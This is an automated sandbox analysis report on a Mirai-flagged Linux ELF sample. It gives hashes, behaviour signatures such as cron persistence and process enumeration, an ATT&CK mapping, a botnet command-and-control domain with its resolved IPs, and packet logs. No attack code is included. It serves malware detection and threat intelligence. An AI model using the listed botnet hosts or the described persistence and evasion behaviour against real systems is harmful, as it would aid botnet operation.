Edit tour
Linux
Analysis Report
mpsl.elf
Overview
General Information
Sample name: | mpsl.elf |
Analysis ID: | 1541164 |
MD5: | 21256c2ed906767ea878798b626bbd96 |
SHA1: | 2eba4ba74f0ab72e1450b9d69e37416acfd6f987 |
SHA256: | f7f8dd8891b1cfa2703a5b090a8c523a7b22bdd4c87c6793af86e30bc080e2a8 |
Tags: | elfuser-abuse_ch |
Infos: |
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Found strings indicative of a multi-platform dropper
Sample has stripped symbol table
Sample listens on a socket
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)
Classification
Joe Sandbox version: | 41.0.0 Charoite |
Analysis ID: | 1541164 |
Start date and time: | 2024-10-24 14:27:05 +02:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 5m 6s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultlinuxfilecookbook.jbs |
Analysis system description: | Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11) |
Analysis Mode: | default |
Sample name: | mpsl.elf |
Detection: | MAL |
Classification: | mal48.troj.linELF@0/1@5/0 |
- VT rate limit hit for: mpsl.elf
Command: | /tmp/mpsl.elf |
PID: | 6214 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | you are now apart of hail cock botnet |
Standard Error: | no crontab for root |
- system is lnxubuntu20
- mpsl.elf New Fork (PID: 6217, Parent: 6214)
- sh New Fork (PID: 6220, Parent: 6217)
- mpsl.elf New Fork (PID: 6222, Parent: 6214)
- mpsl.elf New Fork (PID: 6273, Parent: 6222)
- mpsl.elf New Fork (PID: 6275, Parent: 6222)
- mpsl.elf New Fork (PID: 6224, Parent: 6214)
- mpsl.elf New Fork (PID: 6234, Parent: 6214)
- cleanup
⊘No yara matches
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
Source: | String: |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | Socket: | Jump to behavior |
Source: | TCP traffic: | ||
Source: | TCP traffic: | ||
Source: | TCP traffic: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | .symtab present: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Crontab executable: | Jump to behavior | ||
Source: | Crontab executable: | Jump to behavior |
Source: | File: | Jump to behavior | ||
Source: | File: | Jump to behavior |
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior | ||
Source: | File opened: | Jump to behavior |
Source: | Shell command executed: | Jump to behavior |
Source: | Stderr: no crontab for root: |
Source: | Queries kernel information via 'uname': | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: |
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Gather Victim Identity Information | 2 Scripting | Valid Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Scheduled Task/Job | Direct Volume Access | 1 OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Scripting | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service |
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | 2 Application Layer Protocol | Traffic Duplication | Data Destruction |
⊘No configs have been found
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
11% | ReversingLabs | Linux.Backdoor.Mirai |
⊘No Antivirus matches
⊘No Antivirus matches
⊘No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
kingstonwikkerink.dyn | 81.29.149.178 | true | false | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
false | unknown |
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
185.82.200.181 | unknown | Netherlands | 60117 | HSAE | false | |
88.151.195.22 | unknown | Azerbaijan | 15723 | AZERONLINEAZ | false | |
109.202.202.202 | unknown | Switzerland | 13030 | INIT7CH | false | |
31.13.248.89 | unknown | Bulgaria | 34224 | NETERRA-ASBG | false | |
91.189.91.43 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false | |
91.189.91.42 | unknown | United Kingdom | 41231 | CANONICAL-ASGB | false |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
185.82.200.181 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
88.151.195.22 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
109.202.202.202 | Get hash | malicious | Unknown | Browse |
| |
31.13.248.89 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
91.189.91.43 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse | |||
91.189.91.42 | Get hash | malicious | Unknown | Browse | ||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Mirai | Browse | |||
Get hash | malicious | Unknown | Browse | |||
Get hash | malicious | Gafgyt, Mirai | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
kingstonwikkerink.dyn | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
|
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context |
---|---|---|---|---|---|---|
CANONICAL-ASGB | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai, Moobot | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
NETERRA-ASBG | Get hash | malicious | Mirai | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
INIT7CH | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Mirai | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
HSAE | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | AgentTesla | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
Get hash | malicious | Gafgyt, Mirai | Browse |
| ||
AZERONLINEAZ | Get hash | malicious | Unknown | Browse |
| |
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | HTMLPhisher | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
| ||
Get hash | malicious | Unknown | Browse |
|
⊘No context
⊘No context
Process: | /usr/bin/crontab |
File Type: | |
Category: | dropped |
Size (bytes): | 306 |
Entropy (8bit): | 5.137301653713653 |
Encrypted: | false |
SSDEEP: | 6:SUrpqoqQjEOP1KmREJOBFQLYoUZHGMQ5UYLtCFt3HY5DMFDKXsJovYL8jndFKXsV:8QjHig8UxeHLUHYC+GABjnOGAFkz |
MD5: | CBA33860CB3ACA059152C9D7F9714A1B |
SHA1: | 164071E0891748C549A8E61BE6328DA01038448A |
SHA-256: | 4602BEAD538D70683E31D8159FF345204915FE7F1E7D760E98D2B23D4AF25A2A |
SHA-512: | F22FC1B1DD76F005A16F43D0E7523679873D24FC35B4A7D0BFA79F67E07053851F485EFE614B7F74CA104FD5F460BCF90DBA0F6D2BA34AB1886283C35FFAABAC |
Malicious: | true |
Reputation: | low |
Preview: |
File type: | |
Entropy (8bit): | 5.5353733629908515 |
TrID: |
|
File name: | mpsl.elf |
File size: | 102'572 bytes |
MD5: | 21256c2ed906767ea878798b626bbd96 |
SHA1: | 2eba4ba74f0ab72e1450b9d69e37416acfd6f987 |
SHA256: | f7f8dd8891b1cfa2703a5b090a8c523a7b22bdd4c87c6793af86e30bc080e2a8 |
SHA512: | fa4c27d5ea500ba15f404593f5ee9fb3e07d71f5b9cb13722fc99eaee5be8e1d87b5ee5075d57bb4959406257b180864228db9b3443eebe9b38d53375b10de03 |
SSDEEP: | 1536:UHvYMs2ziv1BV7uhsl1zWncjmT9ZtZVm2ZEaoaBEuLC2ZcB7:UHvY100hZjmZZtmj7B7 |
TLSH: | 51A3D61AAF610EFBD86FCD3706B9070535CC551B22A87B3A3574D928F60B54B0AE3D68 |
File Content Preview: | .ELF....................`.@.4...|.......4. ...(...............@...@...........................E...E.$....[..........Q.td...............................<L..'!......'.......................<(..'!... .........9'.. ........................<...'!...$........g9 |
ELF header | |
---|---|
Class: | |
Data: | |
Version: | |
Machine: | |
Version Number: | |
Type: | |
OS/ABI: | |
ABI Version: | 0 |
Entry Point Address: | |
Flags: | |
ELF Header Size: | 52 |
Program Header Offset: | 52 |
Program Header Size: | 32 |
Number of Program Headers: | 3 |
Section Header Offset: | 102012 |
Section Header Size: | 40 |
Number of Section Headers: | 14 |
Header String Table Index: | 13 |
Name | Type | Address | Offset | Size | EntSize | Flags | Flags Description | Link | Info | Align |
---|---|---|---|---|---|---|---|---|---|---|
NULL | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0 | 0 | 0 | ||
.init | PROGBITS | 0x400094 | 0x94 | 0x8c | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.text | PROGBITS | 0x400120 | 0x120 | 0x166e0 | 0x0 | 0x6 | AX | 0 | 0 | 16 |
.fini | PROGBITS | 0x416800 | 0x16800 | 0x5c | 0x0 | 0x6 | AX | 0 | 0 | 4 |
.rodata | PROGBITS | 0x416860 | 0x16860 | 0x1b90 | 0x0 | 0x2 | A | 0 | 0 | 16 |
.ctors | PROGBITS | 0x4583f4 | 0x183f4 | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.dtors | PROGBITS | 0x4583fc | 0x183fc | 0x8 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data.rel.ro | PROGBITS | 0x458408 | 0x18408 | 0x10 | 0x0 | 0x3 | WA | 0 | 0 | 4 |
.data | PROGBITS | 0x458420 | 0x18420 | 0x3c8 | 0x0 | 0x3 | WA | 0 | 0 | 16 |
.got | PROGBITS | 0x4587f0 | 0x187f0 | 0x628 | 0x4 | 0x10000003 | WAp | 0 | 0 | 16 |
.sbss | NOBITS | 0x458e18 | 0x18e18 | 0x2c | 0x0 | 0x10000003 | WAp | 0 | 0 | 4 |
.bss | NOBITS | 0x458e50 | 0x18e18 | 0x5148 | 0x0 | 0x3 | WA | 0 | 0 | 16 |
.mdebug.abi32 | PROGBITS | 0xcde | 0x18e18 | 0x0 | 0x0 | 0x0 | 0 | 0 | 1 | |
.shstrtab | STRTAB | 0x0 | 0x18e18 | 0x64 | 0x0 | 0x0 | 0 | 0 | 1 |
Type | Offset | Virtual Address | Physical Address | File Size | Memory Size | Entropy | Flags | Flags Description | Align | Prog Interpreter | Section Mappings |
---|---|---|---|---|---|---|---|---|---|---|---|
LOAD | 0x0 | 0x400000 | 0x400000 | 0x183f0 | 0x183f0 | 5.5607 | 0x5 | R E | 0x10000 | .init .text .fini .rodata | |
LOAD | 0x183f4 | 0x4583f4 | 0x4583f4 | 0xa24 | 0x5ba4 | 3.9118 | 0x6 | RW | 0x10000 | .ctors .dtors .data.rel.ro .data .got .sbss .bss | |
GNU_STACK | 0x0 | 0x0 | 0x0 | 0x0 | 0x0 | 0.0000 | 0x7 | RWE | 0x4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 24, 2024 14:27:48.600280046 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:48.605719090 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:48.605772018 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:48.614463091 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:48.619769096 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:48.619817972 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:48.625138044 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:48.856209993 CEST | 41618 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:48.861879110 CEST | 9692 | 41618 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:48.861990929 CEST | 41618 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:48.886318922 CEST | 41618 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:48.891954899 CEST | 9692 | 41618 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:48.892010927 CEST | 41618 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:48.897778988 CEST | 9692 | 41618 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:49.826189041 CEST | 9692 | 41618 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:49.826591015 CEST | 41618 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:49.826591015 CEST | 41618 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:52.032373905 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Oct 24, 2024 14:27:52.800398111 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Oct 24, 2024 14:27:54.840958118 CEST | 55712 | 14739 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:54.846426010 CEST | 14739 | 55712 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:54.846509933 CEST | 55712 | 14739 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:54.846509933 CEST | 55712 | 14739 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:54.851900101 CEST | 14739 | 55712 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:54.852008104 CEST | 55712 | 14739 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:54.857418060 CEST | 14739 | 55712 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:55.810477018 CEST | 14739 | 55712 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:55.810619116 CEST | 55712 | 14739 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:55.810620070 CEST | 55712 | 14739 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:58.617151976 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:27:58.622805119 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:58.928771019 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:27:58.928858995 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:28:00.900357008 CEST | 59006 | 21150 | 192.168.2.23 | 31.13.248.89 |
Oct 24, 2024 14:28:00.905946016 CEST | 21150 | 59006 | 31.13.248.89 | 192.168.2.23 |
Oct 24, 2024 14:28:00.906021118 CEST | 59006 | 21150 | 192.168.2.23 | 31.13.248.89 |
Oct 24, 2024 14:28:00.906021118 CEST | 59006 | 21150 | 192.168.2.23 | 31.13.248.89 |
Oct 24, 2024 14:28:00.911402941 CEST | 21150 | 59006 | 31.13.248.89 | 192.168.2.23 |
Oct 24, 2024 14:28:00.911461115 CEST | 59006 | 21150 | 192.168.2.23 | 31.13.248.89 |
Oct 24, 2024 14:28:00.916886091 CEST | 21150 | 59006 | 31.13.248.89 | 192.168.2.23 |
Oct 24, 2024 14:28:01.530522108 CEST | 21150 | 59006 | 31.13.248.89 | 192.168.2.23 |
Oct 24, 2024 14:28:01.530663967 CEST | 59006 | 21150 | 192.168.2.23 | 31.13.248.89 |
Oct 24, 2024 14:28:01.537900925 CEST | 21150 | 59006 | 31.13.248.89 | 192.168.2.23 |
Oct 24, 2024 14:28:06.543131113 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Oct 24, 2024 14:28:06.549498081 CEST | 16227 | 56726 | 185.82.200.181 | 192.168.2.23 |
Oct 24, 2024 14:28:06.549586058 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Oct 24, 2024 14:28:06.549587011 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Oct 24, 2024 14:28:06.555202961 CEST | 16227 | 56726 | 185.82.200.181 | 192.168.2.23 |
Oct 24, 2024 14:28:06.555262089 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Oct 24, 2024 14:28:06.560581923 CEST | 16227 | 56726 | 185.82.200.181 | 192.168.2.23 |
Oct 24, 2024 14:28:07.134443045 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Oct 24, 2024 14:28:16.557209969 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Oct 24, 2024 14:28:16.562860012 CEST | 16227 | 56726 | 185.82.200.181 | 192.168.2.23 |
Oct 24, 2024 14:28:16.803698063 CEST | 16227 | 56726 | 185.82.200.181 | 192.168.2.23 |
Oct 24, 2024 14:28:16.803762913 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Oct 24, 2024 14:28:19.424671888 CEST | 42836 | 443 | 192.168.2.23 | 91.189.91.43 |
Oct 24, 2024 14:28:23.516096115 CEST | 42516 | 80 | 192.168.2.23 | 109.202.202.202 |
Oct 24, 2024 14:28:48.088876963 CEST | 43928 | 443 | 192.168.2.23 | 91.189.91.42 |
Oct 24, 2024 14:29:18.978869915 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:29:19.188601971 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:29:19.291270971 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:29:19.291285038 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:29:19.596698046 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:29:19.596867085 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:29:36.858244896 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Oct 24, 2024 14:29:36.864567041 CEST | 16227 | 56726 | 185.82.200.181 | 192.168.2.23 |
Oct 24, 2024 14:29:37.105186939 CEST | 16227 | 56726 | 185.82.200.181 | 192.168.2.23 |
Oct 24, 2024 14:29:37.105321884 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Oct 24, 2024 14:30:39.647819996 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:30:39.653255939 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:30:39.958915949 CEST | 9692 | 41616 | 88.151.195.22 | 192.168.2.23 |
Oct 24, 2024 14:30:39.959074020 CEST | 41616 | 9692 | 192.168.2.23 | 88.151.195.22 |
Oct 24, 2024 14:30:57.161326885 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Oct 24, 2024 14:30:57.167777061 CEST | 16227 | 56726 | 185.82.200.181 | 192.168.2.23 |
Oct 24, 2024 14:30:57.407732010 CEST | 16227 | 56726 | 185.82.200.181 | 192.168.2.23 |
Oct 24, 2024 14:30:57.407903910 CEST | 56726 | 16227 | 192.168.2.23 | 185.82.200.181 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Oct 24, 2024 14:27:48.568238974 CEST | 49535 | 53 | 192.168.2.23 | 65.21.1.106 |
Oct 24, 2024 14:27:48.595432043 CEST | 53 | 49535 | 65.21.1.106 | 192.168.2.23 |
Oct 24, 2024 14:27:48.810818911 CEST | 38631 | 53 | 192.168.2.23 | 65.21.1.106 |
Oct 24, 2024 14:27:48.838268995 CEST | 53 | 38631 | 65.21.1.106 | 192.168.2.23 |
Oct 24, 2024 14:27:54.829205036 CEST | 43027 | 53 | 192.168.2.23 | 202.61.197.122 |
Oct 24, 2024 14:27:54.840143919 CEST | 53 | 43027 | 202.61.197.122 | 192.168.2.23 |
Oct 24, 2024 14:28:00.811876059 CEST | 34684 | 53 | 192.168.2.23 | 168.235.111.72 |
Oct 24, 2024 14:28:00.899835110 CEST | 53 | 34684 | 168.235.111.72 | 192.168.2.23 |
Oct 24, 2024 14:28:06.531903982 CEST | 42724 | 53 | 192.168.2.23 | 194.36.144.87 |
Oct 24, 2024 14:28:06.542402029 CEST | 53 | 42724 | 194.36.144.87 | 192.168.2.23 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 24, 2024 14:27:48.568238974 CEST | 192.168.2.23 | 65.21.1.106 | 0x2a66 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 24, 2024 14:27:48.810818911 CEST | 192.168.2.23 | 65.21.1.106 | 0x2a66 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 24, 2024 14:27:54.829205036 CEST | 192.168.2.23 | 202.61.197.122 | 0xa56f | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 24, 2024 14:28:00.811876059 CEST | 192.168.2.23 | 168.235.111.72 | 0x8af0 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Oct 24, 2024 14:28:06.531903982 CEST | 192.168.2.23 | 194.36.144.87 | 0x6085 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 193.233.193.45 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 194.87.198.29 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 195.133.92.51 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.595432043 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 31.13.248.89 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 81.29.149.178 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 91.149.238.18 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 86.107.100.80 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 213.182.204.57 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 91.149.218.232 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 88.151.195.22 | A (IP address) | IN (0x0001) | false | ||
Oct 24, 2024 14:27:48.838268995 CEST | 65.21.1.106 | 192.168.2.23 | 0x2a66 | No error (0) | 185.82.200.181 | A (IP address) | IN (0x0001) | false | ||
